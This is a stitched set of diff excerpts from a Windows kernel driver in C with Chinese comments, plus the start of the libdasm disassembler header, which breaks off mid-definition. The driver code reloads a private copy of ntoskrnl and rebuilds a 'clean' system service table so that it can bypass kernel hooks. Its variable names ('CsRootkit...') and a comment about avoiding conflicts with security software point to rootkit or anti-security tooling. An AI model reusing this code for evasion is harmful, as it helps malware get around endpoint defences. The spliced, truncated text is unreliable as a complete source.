ULONG ReLoadNtosCALL(WCHAR *lpwzFuncTion,ULONG ulOldNtosBase,ULONG ulReloadNtosBase)
{
UNICODE_STRING UnicodeFunctionName;
ULONG ulOldFunctionAddress;
PUCHAR ulReloadFunctionAddress = NULL;
int index=0;
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base, x, functionAddress,position;
char* functionName;
IMAGE_EXPORT_DIRECTORY *pExportTable;
ULONG ulNtDllModuleBase;
UNICODE_STRING UnicodeFunction;
UNICODE_STRING UnicodeExportTableFunction;
ANSI_STRING ExportTableFunction;
//第一次都是通过 系统的原来偏移 + NewBase 获得函数地址
//然后通过自己的RMmGetSystemRoutineAddress获得 偏移+NewBase 获得函数地址
__try
{
if (RRtlInitUnicodeString &&
RRtlCompareUnicodeString &&
RMmGetSystemRoutineAddress &&
RMmIsAddressValid)
{
RRtlInitUnicodeString(&UnicodeFunctionName,lpwzFuncTion);
ulOldFunctionAddress = (DWORD)RMmGetSystemRoutineAddress(&UnicodeFunctionName);
ulReloadFunctionAddress = (PUCHAR)(ulOldFunctionAddress - ulOldNtosBase + ulReloadNtosBase); //获得重载的FuncAddr
if (RMmIsAddressValid(ulReloadFunctionAddress)) //如果无效就从 导出表 获取? 应该不会无效
{
return (ULONG)ulReloadFunctionAddress;
}
//从导出表里获取
ulNtDllModuleBase = ulReloadNtosBase;
pDosHeader = (PIMAGE_DOS_HEADER)ulReloadNtosBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulNtDllModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulNtDllModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulNtDllModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)((BYTE*)ulNtDllModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
for(x = 0; x < pExportTable->NumberOfFunctions; x++) //在整个导出表里扫描
{
functionName = (char*)( (BYTE*)ulNtDllModuleBase + arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
functionAddress = (DWORD)((BYTE*)ulNtDllModuleBase + arrayOfFunctionAddresses[functionOrdinal]);
RtlInitAnsiString(&ExportTableFunction,functionName);
RtlAnsiStringToUnicodeString(&UnicodeExportTableFunction,&ExportTableFunction,TRUE);
RRtlInitUnicodeString(&UnicodeFunction,lpwzFuncTion);
if (RRtlCompareUnicodeString(&UnicodeExportTableFunction,&UnicodeFunction,TRUE) == 0)
{
RtlFreeUnicodeString(&UnicodeExportTableFunction);
return functionAddress;
}
RtlFreeUnicodeString(&UnicodeExportTableFunction);
}
return 0;
}
RtlInitUnicodeString(&UnicodeFunctionName,lpwzFuncTion);
ulOldFunctionAddress = (DWORD)MmGetSystemRoutineAddress(&UnicodeFunctionName);
ulReloadFunctionAddress = (PUCHAR)(ulOldFunctionAddress - ulOldNtosBase + ulReloadNtosBase);
//KdPrint(("%ws:%08x:%08x",lpwzFuncTion,ulOldFunctionAddress,ulReloadFunctionAddress));
if (MmIsAddressValid(ulReloadFunctionAddress))
{
return (ULONG)ulReloadFunctionAddress;
}
//
}__except(EXCEPTION_EXECUTE_HANDLER){
KdPrint(("EXCEPTION_EXECUTE_HANDLER"));
}
return 0;
}
/*重载Ntos*/
NTSTATUS ReLoadNtos(PDRIVER_OBJECT DriverObject,DWORD RetAddress)
{
NTSTATUS status = STATUS_UNSUCCESSFUL;
ULONG ulKeAddSystemServiceTable;
PULONG p;
if (!GetSystemKernelModuleInfo(
&SystemKernelFilePath,
&SystemKernelModuleBase,
&SystemKernelModuleSize
))
{
KdPrint(("Get System Kernel Module failed"));
return status;
}
if (InitSafeOperationModule(
DriverObject,
SystemKernelFilePath,
SystemKernelModuleBase
))
{
KdPrint(("Init Ntos module success\r\n"));
RRtlInitUnicodeString = NULL;
RMmGetSystemRoutineAddress = NULL;
RMmIsAddressValid = NULL;
RRtlCompareUnicodeString = NULL;
RPsGetCurrentProcess = NULL;
status = STATUS_UNSUCCESSFUL;
//第一次都是通过 系统的原来偏移 + NewBase 获得函数地址
//然后通过自己的RMmGetSystemRoutineAddress获得 偏移+NewBase 获得函数地址
RRtlInitUnicodeString = (ReloadRtlInitUnicodeString)ReLoadNtosCALL(L"RtlInitUnicodeString",SystemKernelModuleBase,ImageModuleBase);
RRtlCompareUnicodeString = (ReloadRtlCompareUnicodeString)ReLoadNtosCALL(L"RtlCompareUnicodeString",SystemKernelModuleBase,ImageModuleBase);
RMmGetSystemRoutineAddress = (ReloadMmGetSystemRoutineAddress)ReLoadNtosCALL(L"MmGetSystemRoutineAddress",SystemKernelModuleBase,ImageModuleBase);
RMmIsAddressValid = (ReloadMmIsAddressValid)ReLoadNtosCALL(L"MmIsAddressValid",SystemKernelModuleBase,ImageModuleBase);
RPsGetCurrentProcess = (ReloadPsGetCurrentProcess)ReLoadNtosCALL(L"PsGetCurrentProcess",SystemKernelModuleBase,ImageModuleBase);
if (!RRtlInitUnicodeString ||
!RRtlCompareUnicodeString ||
!RMmGetSystemRoutineAddress ||
!RMmIsAddressValid ||
!RPsGetCurrentProcess)
{
KdPrint(("Init NtosCALL failed"));
return status;
}
}
return status;
}
BOOLEAN InitSafeOperationModule(PDRIVER_OBJECT pDriverObject,WCHAR *SystemModulePath,ULONG KernelModuleBase)
{
UNICODE_STRING FileName;
HANDLE hSection;
PDWORD FixdOriginalKiServiceTable;
PDWORD CsRootkitOriginalKiServiceTable;
ULONG i = 0;
//自己peload 一个ntos*,这样就解决了跟其他安全软件的冲突啦~
if (!PeLoad(SystemModulePath,(BYTE**)&ImageModuleBase,pDriverObject,KernelModuleBase))
{
return FALSE;
}
OriginalKiServiceTable = ExAllocatePool(NonPagedPool,KeServiceDescriptorTable->TableSize*sizeof(DWORD));
if (!OriginalKiServiceTable)
{
return FALSE;
}
//获得SSDT基址通过重定位表比较得到
if(!GetOriginalKiServiceTable((BYTE*)ImageModuleBase,KernelModuleBase,(DWORD*)&OriginalKiServiceTable))
{
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
//修复SSDT函数地址 都是自己Reload的函数地址 干净的
FixOriginalKiServiceTable((PDWORD)OriginalKiServiceTable,(DWORD)ImageModuleBase,KernelModuleBase);
OriginalServiceDescriptorTable = (PSERVICE_DESCRIPTOR_TABLE)ExAllocatePool(NonPagedPool,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
if (OriginalServiceDescriptorTable == NULL)
{
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
RtlZeroMemory(OriginalServiceDescriptorTable,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
//修复SERVICE_DESCRIPTOR_TABLE 结构
OriginalServiceDescriptorTable->ServiceTable = (PDWORD)OriginalKiServiceTable;
OriginalServiceDescriptorTable->CounterTable = KeServiceDescriptorTable->CounterTable;
OriginalServiceDescriptorTable->TableSize = KeServiceDescriptorTable->TableSize;
OriginalServiceDescriptorTable->ArgumentTable = KeServiceDescriptorTable->ArgumentTable;
CsRootkitOriginalKiServiceTable = (PDWORD)ExAllocatePool(NonPagedPool,KeServiceDescriptorTable->TableSize*sizeof(DWORD));
if (CsRootkitOriginalKiServiceTable==NULL)
{
ExFreePool(OriginalServiceDescriptorTable);
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
RtlZeroMemory(CsRootkitOriginalKiServiceTable,KeServiceDescriptorTable->TableSize*sizeof(DWORD));
Safe_ServiceDescriptorTable = (PSERVICE_DESCRIPTOR_TABLE)ExAllocatePool(NonPagedPool,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
if (Safe_ServiceDescriptorTable == NULL)
{
ExFreePool(OriginalServiceDescriptorTable);
ExFreePool(CsRootkitOriginalKiServiceTable);
ExFreePool(OriginalKiServiceTable);
return FALSE;
}
//这是一个干净的原始表每个表里所对应的SSDT函数的地址都是原始函数
RtlZeroMemory(Safe_ServiceDescriptorTable,sizeof(SERVICE_DESCRIPTOR_TABLE)*4);
//填充原始函数地址
for (i = 0; i < KeServiceDescriptorTable->TableSize; i++)
{
CsRootkitOriginalKiServiceTable[i] = OriginalServiceDescriptorTable->ServiceTable[i];
}
Safe_ServiceDescriptorTable->ServiceTable = (PDWORD)CsRootkitOriginalKiServiceTable;
Safe_ServiceDescriptorTable->CounterTable = KeServiceDescriptorTable->CounterTable;
Safe_ServiceDescriptorTable->TableSize = KeServiceDescriptorTable->TableSize;
Safe_ServiceDescriptorTable->ArgumentTable = KeServiceDescriptorTable->ArgumentTable;
//释放就会bsod
//ExFreePool(OriginalKiServiceTable);
return TRUE;
}
VOID FixOriginalKiServiceTable(PDWORD OriginalKiServiceTable,DWORD ModuleBase,DWORD ExistImageBase)
{
DWORD FuctionCount;
DWORD Index;
FuctionCount=KeServiceDescriptorTable->TableSize; //函数个数
KdPrint(("ssdt funcion count:%X---KiServiceTable:%X\n",FuctionCount,KeServiceDescriptorTable->ServiceTable));
for (Index=0;Index<FuctionCount;Index++)
{
OriginalKiServiceTable[Index]=OriginalKiServiceTable[Index]-ExistImageBase+ModuleBase; //修复SSDT函数地址
}
}
//通过KeServiceDescriptorTable的RVA与重定位表项解析的地址RVA比较一致则取出其中的SSDT表地址
BOOLEAN GetOriginalKiServiceTable(BYTE *NewImageBase,DWORD ExistImageBase,DWORD *NewKiServiceTable)
{
PIMAGE_DOS_HEADER ImageDosHeader;
PIMAGE_NT_HEADERS ImageNtHeaders;
DWORD KeServiceDescriptorTableRva;
PIMAGE_BASE_RELOCATION ImageBaseReloc=NULL;
DWORD RelocSize;
int ItemCount,Index;
int Type;
PDWORD RelocAddress;
DWORD RvaData;
DWORD count=0;
WORD *TypeOffset;
ImageDosHeader=(PIMAGE_DOS_HEADER)NewImageBase;
if (ImageDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
return FALSE;
}
ImageNtHeaders=(PIMAGE_NT_HEADERS)(NewImageBase+ImageDosHeader->e_lfanew);
if (ImageNtHeaders->Signature!=IMAGE_NT_SIGNATURE)
{
return FALSE;
}
KeServiceDescriptorTableRva=(DWORD)MiFindExportedRoutine(NewImageBase,TRUE,"KeServiceDescriptorTable",0);
if (KeServiceDescriptorTableRva==0)
{
return FALSE;
}
KeServiceDescriptorTableRva=KeServiceDescriptorTableRva-(DWORD)NewImageBase;
ImageBaseReloc=RtlImageDirectoryEntryToData(NewImageBase,TRUE,IMAGE_DIRECTORY_ENTRY_BASERELOC,&RelocSize);
if (ImageBaseReloc==NULL)
{
return FALSE;
}
while (ImageBaseReloc->SizeOfBlock)
{
count++;
ItemCount=(ImageBaseReloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))/2;
TypeOffset=(WORD*)((DWORD)ImageBaseReloc+sizeof(IMAGE_BASE_RELOCATION));
for (Index=0;Index<ItemCount;Index++)
{
Type=TypeOffset[Index]>>12; //高4位是类型 低12位位页内偏移 4k
if (Type==3)
{
//Base + Virtual 定位到页 + 低12位 = RelocAddress 需要修复的地址
RelocAddress=(PDWORD)((DWORD)(TypeOffset[Index]&0x0fff)+ImageBaseReloc->VirtualAddress+(DWORD)NewImageBase);
RvaData=*RelocAddress-ExistImageBase;
if (RvaData==KeServiceDescriptorTableRva) //重定位表中的rva 是 KeServiceDescriptorTable 表项的
{
if(*(USHORT*)((DWORD)RelocAddress-2)==0x05c7)
{
/*
1: kd> dd 0x89651c12 RelocAddress - 2
89651c12 79c005c7 bd9c83f8
1: kd> dd KeServiceDescriptorTable
83f879c0 83e9bd9c 00000000 00000191 83e9c3e4
83f879d0 00000000 00000000 00000000 00000000
1: kd> dd 0x89651c14 RelocAddress
89651c14 83f879c0 83e9bd9c 79c41589 c8a383f8
89651c24 c783f879 f879cc05 e9c3e483 d8158983
*/
//RelocAddress 里面存放着 KeServiceDesriptorTable地址
//RelocAddress + 4 存放着 KeServiceDesriptorTable第一成员也就是SSDT基址
*NewKiServiceTable=*(DWORD*)((DWORD)RelocAddress+4)-ExistImageBase+(DWORD)NewImageBase;
return TRUE;
}
}
}
}
ImageBaseReloc=(PIMAGE_BASE_RELOCATION)((DWORD)ImageBaseReloc+ImageBaseReloc->SizeOfBlock);
}
return FALSE;
}


@ -1,242 +0,0 @@
#include "DriverEntry.h"
#include <ntimage.h>
#pragma once
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned char BYTE, *PBYTE;
typedef unsigned short WORD, *PWORD;
typedef struct _SYSTEM_MODULE_INFORMATION // 系统模块信息
{
ULONG Reserved[2];
ULONG Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef struct _tagSysModuleList { //模块链结构
ULONG ulCount;
SYSTEM_MODULE_INFORMATION smi[1];
} MODULES, *PMODULES;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation, // 0 Y N
SystemProcessorInformation, // 1 Y N
SystemPerformanceInformation, // 2 Y N
SystemTimeOfDayInformation, // 3 Y N
SystemNotImplemented1, // 4 Y N
SystemProcessesAndThreadsInformation, // 5 Y N
SystemCallCounts, // 6 Y N
SystemConfigurationInformation, // 7 Y N
SystemProcessorTimes, // 8 Y N
SystemGlobalFlag, // 9 Y Y
SystemNotImplemented2, // 10 Y N
SystemModuleInformation, // 11 Y N
SystemLockInformation, // 12 Y N
SystemNotImplemented3, // 13 Y N
SystemNotImplemented4, // 14 Y N
SystemNotImplemented5, // 15 Y N
SystemHandleInformation, // 16 Y N
SystemObjectInformation, // 17 Y N
SystemPagefileInformation, // 18 Y N
SystemInstructionEmulationCounts, // 19 Y N
SystemInvalidInfoClass1, // 20
SystemCacheInformation, // 21 Y Y
SystemPoolTagInformation, // 22 Y N
SystemProcessorStatistics, // 23 Y N
SystemDpcInformation, // 24 Y Y
SystemNotImplemented6, // 25 Y N
SystemLoadImage, // 26 N Y
SystemUnloadImage, // 27 N Y
SystemTimeAdjustment, // 28 Y Y
SystemNotImplemented7, // 29 Y N
SystemNotImplemented8, // 30 Y N
SystemNotImplemented9, // 31 Y N
SystemCrashDumpInformation, // 32 Y N
SystemExceptionInformation, // 33 Y N
SystemCrashDumpStateInformation, // 34 Y Y/N
SystemKernelDebuggerInformation, // 35 Y N
SystemContextSwitchInformation, // 36 Y N
SystemRegistryQuotaInformation, // 37 Y Y
SystemLoadAndCallImage, // 38 N Y
SystemPrioritySeparation, // 39 N Y
SystemNotImplemented10, // 40 Y N
SystemNotImplemented11, // 41 Y N
SystemInvalidInfoClass2, // 42
SystemInvalidInfoClass3, // 43
SystemTimeZoneInformation, // 44 Y N
SystemLookasideInformation, // 45 Y N
SystemSetTimeSlipEvent, // 46 N Y
SystemCreateSession, // 47 N Y
SystemDeleteSession, // 48 N Y
SystemInvalidInfoClass4, // 49
SystemRangeStartInformation, // 50 Y N
SystemVerifierInformation, // 51 Y Y
SystemAddVerifier, // 52 N Y
SystemSessionProcessesInformation // 53 Y N
} SYSTEM_INFORMATION_CLASS;
#define LDRP_RELOCATION_FINAL 0x2
#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)
typedef struct _AUX_ACCESS_DATA {
PPRIVILEGE_SET PrivilegesUsed;
GENERIC_MAPPING GenericMapping;
ACCESS_MASK AccessesToAudit;
ACCESS_MASK MaximumAuditMask;
ULONG Unknown[41];
} AUX_ACCESS_DATA, *PAUX_ACCESS_DATA;
typedef struct _LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
union
{
LIST_ENTRY HashLinks;
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
};
union
{
ULONG TimeDateStamp;
PVOID LoadedImports;
};
PVOID EntryPointActivationContext;
PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// typedef struct _IMAGE_BASE_RELOCATION {
// DWORD VirtualAddress;
// DWORD SizeOfBlock;
// // WORD TypeOffset[1];
// } IMAGE_BASE_RELOCATION,*PIMAGE_BASE_RELOCATION;
// typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION;
typedef struct _SERVICE_DESCRIPTOR_TABLE {
/*
* Table containing cServices elements of pointers to service handler
* functions, indexed by service ID.
*/
PDWORD ServiceTable;
/*
* Table that counts how many times each service is used. This table
* is only updated in checked builds.
*/
PULONG CounterTable;
/*
* Number of services contained in this table.
*/
ULONG TableSize;
/*
* Table containing the number of bytes of parameters the handler
* function takes.
*/
PUCHAR ArgumentTable;
} SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;
NTSTATUS ReLoadNtos(PDRIVER_OBJECT DriverObject,DWORD RetAddress);
NTSTATUS
NTAPI
ZwQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInfoClass,
OUT PVOID SystemInfoBuffer,
IN ULONG SystemInfoBufferSize,
OUT PULONG BytesReturned OPTIONAL
);
NTSTATUS
NTAPI
ObCreateObject (
IN KPROCESSOR_MODE ObjectAttributesAccessMode OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
IN ULONG ObjectSize,
IN ULONG PagedPoolCharge OPTIONAL,
IN ULONG NonPagedPoolCharge OPTIONAL,
OUT PVOID *Object
);
NTSTATUS
NTAPI
SeCreateAccessState(
PACCESS_STATE AccessState,
PAUX_ACCESS_DATA AuxData,
ACCESS_MASK Access,
PGENERIC_MAPPING GenericMapping
);
NTSYSAPI
PVOID
NTAPI
RtlImageDirectoryEntryToData (
IN PVOID Base,
IN BOOLEAN MappedAsImage,
IN USHORT DirectoryEntry,
OUT PULONG Size
);
BOOLEAN InitSafeOperationModule(PDRIVER_OBJECT pDriverObject,WCHAR *SystemModulePath,ULONG KernelModuleBase);
typedef VOID (__stdcall *ReloadRtlInitUnicodeString)(
__inout PUNICODE_STRING DestinationString,
__in_opt PCWSTR SourceString
);
ReloadRtlInitUnicodeString RRtlInitUnicodeString;
typedef LONG (__stdcall * ReloadRtlCompareUnicodeString)(
__in PCUNICODE_STRING String1,
__in PCUNICODE_STRING String2,
__in BOOLEAN CaseInSensitive
);
ReloadRtlCompareUnicodeString RRtlCompareUnicodeString;
typedef PVOID (__stdcall *ReloadMmGetSystemRoutineAddress)(
__in PUNICODE_STRING SystemRoutineName
);
ReloadMmGetSystemRoutineAddress RMmGetSystemRoutineAddress;
typedef BOOLEAN (__stdcall * ReloadMmIsAddressValid)(
__in PVOID VirtualAddress
);
ReloadMmIsAddressValid RMmIsAddressValid;
typedef PEPROCESS (__stdcall *ReloadPsGetCurrentProcess)(void);
ReloadPsGetCurrentProcess RPsGetCurrentProcess;
BOOLEAN GetOriginalKiServiceTable(BYTE *NewImageBase,DWORD ExistImageBase,DWORD *NewKiServiceTable);
VOID FixOriginalKiServiceTable(PDWORD OriginalKiServiceTable,DWORD ModuleBase,DWORD ExistImageBase);


@ -1,515 +0,0 @@
/*
* libdasm -- simple x86 disassembly library
* (c) 2004 - 2005 jt / nologin.org
*
*/
#ifndef _LIBDASM_H
#define _LIBDASM_H
#ifdef __cplusplus
extern "C" {
#endif
#define __LIBDASM_VERSION__ 0x01020000
#define GET_VERSION_MAJOR \
(__LIBDASM_VERSION__ & 0xff000000) >> 24
#define GET_VERSION_MINOR1 \
(__LIBDASM_VERSION__ & 0x00ff0000) >> 16
#define GET_VERSION_MINOR2 \
(__LIBDASM_VERSION__ & 0x0000ff00) >> 8
#define GET_VERSION_MINOR3 \
(__LIBDASM_VERSION__ & 0x000000ff)
// Data types
#if _WIN32
//#include <windows.h>
#define __inline__ __inline
#define snprintf _snprintf
typedef unsigned __int64 QWORD; // for MSVC
typedef signed __int8 SBYTE;
typedef signed __int16 SWORD;
typedef signed __int32 SDWORD;
typedef signed __int64 SQWORD;
#else
#if defined __sun
#define BYTE_ORDER 1234
#define BIG_ENDIAN 1234
#define LITTLE_ENDIAN 4321
#define u_int8_t uint8_t
#define u_int16_t uint16_t
#define u_int32_t uint32_t
#define u_int64_t uint64_t
#endif // other *nix
#include <sys/types.h>
typedef u_int8_t BYTE;
typedef u_int16_t WORD;
typedef u_int32_t DWORD;
typedef u_int64_t QWORD;
typedef int8_t SBYTE;
typedef int16_t SWORD;
typedef int32_t SDWORD;
typedef int64_t SQWORD;
#endif
// Define endianess
#ifndef __X86__
// These should catch x86 with most compilers
#if defined _X86_ || defined _i386_ || defined __i386__
#define __X86__
#endif
#endif
#ifndef __LITTLE_ENDIAN__
// These should catch little-endian with most compilers
#if (BYTE_ORDER == LITTLE_ENDIAN) || defined __X86__ || defined _ALPHA_
#define __LITTLE_ENDIAN__
#endif
#endif
typedef unsigned long DWORD;
typedef unsigned long *PDWORD;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef unsigned char *PBYTE;
//typedef unsigned short HMODULE;
// Registers
#define REGISTER_EAX 0
#define REGISTER_ECX 1
#define REGISTER_EDX 2
#define REGISTER_EBX 3
#define REGISTER_ESP 4
#define REGISTER_EBP 5
#define REGISTER_ESI 6
#define REGISTER_EDI 7
#define REGISTER_NOP 10 // no register defined
// Registers
#define MASK_REG(x) ((x) & 0x000000FF)
#define REG_EAX REGISTER_EAX
#define REG_AX REG_EAX
#define REG_AL REG_EAX
#define REG_ES REG_EAX // Just for reg_table consistence
#define REG_ST0 REG_EAX // Just for reg_table consistence
#define REG_ECX REGISTER_ECX
#define REG_CX REG_ECX
#define REG_CL REG_ECX
#define REG_CS REG_ECX
#define REG_ST1 REG_ECX
#define REG_EDX REGISTER_EDX
#define REG_DX REG_EDX
#define REG_DL REG_EDX
#define REG_SS REG_EDX
#define REG_ST2 REG_EDX
#define REG_EBX REGISTER_EBX
#define REG_BX REG_EBX
#define REG_BL REG_EBX
#define REG_DS REG_EBX
#define REG_ST3 REG_EBX
#define REG_ESP REGISTER_ESP
#define REG_SP REG_ESP
#define REG_AH REG_ESP // Just for reg_table consistence
#define REG_FS REG_ESP
#define REG_ST4 REG_ESP
#define REG_EBP REGISTER_EBP
#define REG_BP REG_EBP
#define REG_CH REG_EBP
#define REG_GS REG_EBP
#define REG_ST5 REG_EBP
#define REG_ESI REGISTER_ESI
#define REG_SI REG_ESI
#define REG_DH REG_ESI
#define REG_ST6 REG_ESI
#define REG_EDI REGISTER_EDI
#define REG_DI REG_EDI
#define REG_BH REG_EDI
#define REG_ST7 REG_EDI
#define REG_NOP REGISTER_NOP
// Register types
#define REGISTER_TYPE_GEN 1
#define REGISTER_TYPE_SEGMENT 2
#define REGISTER_TYPE_DEBUG 3
#define REGISTER_TYPE_CONTROL 4
#define REGISTER_TYPE_TEST 5
#define REGISTER_TYPE_XMM 6
#define REGISTER_TYPE_MMX 7
#define REGISTER_TYPE_FPU 8
// Disassembling mode
enum Mode {
MODE_32, // 32-bit
MODE_16 // 16-bit
};
// Disassembling format
enum Format {
FORMAT_ATT,
FORMAT_INTEL,
};
// Instruction types (just the most common ones atm)
enum Instruction {
// Integer instructions
INSTRUCTION_TYPE_ASC, // aaa, aam, etc.
INSTRUCTION_TYPE_DCL, // daa, das
INSTRUCTION_TYPE_MOV,
INSTRUCTION_TYPE_MOVSR, // segment register
INSTRUCTION_TYPE_ADD,
INSTRUCTION_TYPE_XADD,
INSTRUCTION_TYPE_ADC,
INSTRUCTION_TYPE_SUB,
INSTRUCTION_TYPE_SBB,
INSTRUCTION_TYPE_INC,
INSTRUCTION_TYPE_DEC,
INSTRUCTION_TYPE_DIV,
INSTRUCTION_TYPE_IDIV,
INSTRUCTION_TYPE_NOT,
INSTRUCTION_TYPE_NEG,
INSTRUCTION_TYPE_STOS,
INSTRUCTION_TYPE_LODS,
INSTRUCTION_TYPE_SCAS,
INSTRUCTION_TYPE_MOVS,
INSTRUCTION_TYPE_MOVSX,
INSTRUCTION_TYPE_MOVZX,
INSTRUCTION_TYPE_CMPS,
INSTRUCTION_TYPE_SHX, // signed/unsigned shift left/right
INSTRUCTION_TYPE_ROX, // signed/unsigned rot left/right
INSTRUCTION_TYPE_MUL,
INSTRUCTION_TYPE_IMUL,
INSTRUCTION_TYPE_EIMUL, // "extended" imul with 2-3 operands
INSTRUCTION_TYPE_XOR,
INSTRUCTION_TYPE_LEA,
INSTRUCTION_TYPE_XCHG,
INSTRUCTION_TYPE_CMP,
INSTRUCTION_TYPE_TEST,
INSTRUCTION_TYPE_PUSH,
INSTRUCTION_TYPE_AND,
INSTRUCTION_TYPE_OR,
INSTRUCTION_TYPE_POP,
INSTRUCTION_TYPE_JMP,
INSTRUCTION_TYPE_JMPC, // conditional jump
INSTRUCTION_TYPE_SETC, // conditional byte set
INSTRUCTION_TYPE_MOVC, // conditional mov
INSTRUCTION_TYPE_LOOP,
INSTRUCTION_TYPE_CALL,
INSTRUCTION_TYPE_RET,
INSTRUCTION_TYPE_INT, // interrupt
INSTRUCTION_TYPE_BT, // bit tests
INSTRUCTION_TYPE_BTS,
INSTRUCTION_TYPE_BTR,
INSTRUCTION_TYPE_BTC,
INSTRUCTION_TYPE_BSF,
INSTRUCTION_TYPE_BSR,
INSTRUCTION_TYPE_BSWAP,
INSTRUCTION_TYPE_SGDT,
INSTRUCTION_TYPE_SIDT,
INSTRUCTION_TYPE_SLDT,
INSTRUCTION_TYPE_LFP,
// FPU instructions
INSTRUCTION_TYPE_FCMOVC, // float conditional mov
INSTRUCTION_TYPE_FADD,
INSTRUCTION_TYPE_FADDP,
INSTRUCTION_TYPE_FIADD,
INSTRUCTION_TYPE_FSUB,
INSTRUCTION_TYPE_FSUBP,
INSTRUCTION_TYPE_FISUB,
INSTRUCTION_TYPE_FSUBR,
INSTRUCTION_TYPE_FSUBRP,
INSTRUCTION_TYPE_FISUBR,
INSTRUCTION_TYPE_FMUL,
INSTRUCTION_TYPE_FMULP,
INSTRUCTION_TYPE_FIMUL,
INSTRUCTION_TYPE_FDIV,
INSTRUCTION_TYPE_FDIVP,
INSTRUCTION_TYPE_FDIVR,
INSTRUCTION_TYPE_FDIVRP,
INSTRUCTION_TYPE_FIDIV,
INSTRUCTION_TYPE_FIDIVR,
INSTRUCTION_TYPE_FCOM,
INSTRUCTION_TYPE_FCOMP,
INSTRUCTION_TYPE_FCOMPP,
INSTRUCTION_TYPE_FCOMI,
INSTRUCTION_TYPE_FCOMIP,
INSTRUCTION_TYPE_FUCOM,
INSTRUCTION_TYPE_FUCOMP,
INSTRUCTION_TYPE_FUCOMPP,
INSTRUCTION_TYPE_FUCOMI,
INSTRUCTION_TYPE_FUCOMIP,
INSTRUCTION_TYPE_FST,
INSTRUCTION_TYPE_FSTP,
INSTRUCTION_TYPE_FIST,
INSTRUCTION_TYPE_FISTP,
INSTRUCTION_TYPE_FISTTP,
INSTRUCTION_TYPE_FLD,
INSTRUCTION_TYPE_FILD,
INSTRUCTION_TYPE_FICOM,
INSTRUCTION_TYPE_FICOMP,
INSTRUCTION_TYPE_FFREE,
INSTRUCTION_TYPE_FFREEP,
INSTRUCTION_TYPE_FXCH,
INSTRUCTION_TYPE_FPU, // Other FPU instructions
INSTRUCTION_TYPE_MMX, // Other MMX instructions
INSTRUCTION_TYPE_SSE, // Other SSE instructions
INSTRUCTION_TYPE_OTHER, // Other instructions :-)
INSTRUCTION_TYPE_PRIV // Privileged instruction
};
// Operand types
enum Operand {
OPERAND_TYPE_NONE, // operand not present
OPERAND_TYPE_MEMORY, // memory operand ([eax], [0], etc.)
OPERAND_TYPE_REGISTER, // register operand (eax, mm0, etc.)
OPERAND_TYPE_IMMEDIATE, // immediate operand (0x1234)
};
// Structure definitions
// struct INST is used internally by the library
typedef struct _INST {
enum Instruction type; // Instruction type
const char *mnemonic; // Instruction mnemonic
int flags1; // First operand flags (if any)
int flags2; // Second operand flags (if any)
int flags3; // Additional operand flags (if any)
int modrm; // Is MODRM byte present?
} INST, *PINST;
// Operands for the instruction
typedef struct _OPERAND {
enum Operand type; // Operand type (register, memory, etc)
int reg; // Register (if any)
int basereg; // Base register (if any)
int indexreg; // Index register (if any)
int scale; // Scale (if any)
int dispbytes; // Displacement bytes (0 = no displacement)
int dispoffset; // Displacement value offset
int immbytes; // Immediate bytes (0 = no immediate)
int immoffset; // Immediate value offset
int sectionbytes; // Section prefix bytes (0 = no section prefix)
WORD section; // Section prefix value
DWORD displacement; // Displacement value
DWORD immediate; // Immediate value
int flags; // Operand flags
} OPERAND, *POPERAND;
// struct INSTRUCTION is used to interface the library
typedef struct _INSTRUCTION {
